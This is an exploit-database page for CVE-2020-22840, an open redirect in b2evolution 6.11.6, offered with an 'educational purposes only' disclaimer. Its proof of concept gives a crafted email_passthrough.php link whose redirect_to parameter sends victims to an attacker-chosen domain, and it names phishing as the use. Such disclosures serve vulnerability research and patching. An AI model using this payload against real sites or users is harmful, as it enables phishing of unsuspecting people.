B2evolution 6.11.6 redirect_to open redirect Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-02-11 | Type : webapps | Platform : php
This exploit / vulnerability B2evolution 6.11.6 redirect_to open redirect is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: b2evolution 6.11.6 - 'redirect_to' Open Redirect
# Date: 10/02/2021
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
# Version: 6.11.6
# Tested on: latest version of Chrome, Firefox on Windows and Linux
# CVE : CVE-2020-22840


--------------------------Proof of Concept-----------------------


1. Send the following link : http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com to the unsuspecting user
2. The user will be redirected to Google.com or any other attacker controlled domain
3. This can be used to perform malicious phishing campaigns on unsuspecting users

B2evolution 6.11.6 redirect_to open redirect


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
B2evolution 6.11.6 redirect_to open redirect Vulnerability / Exploit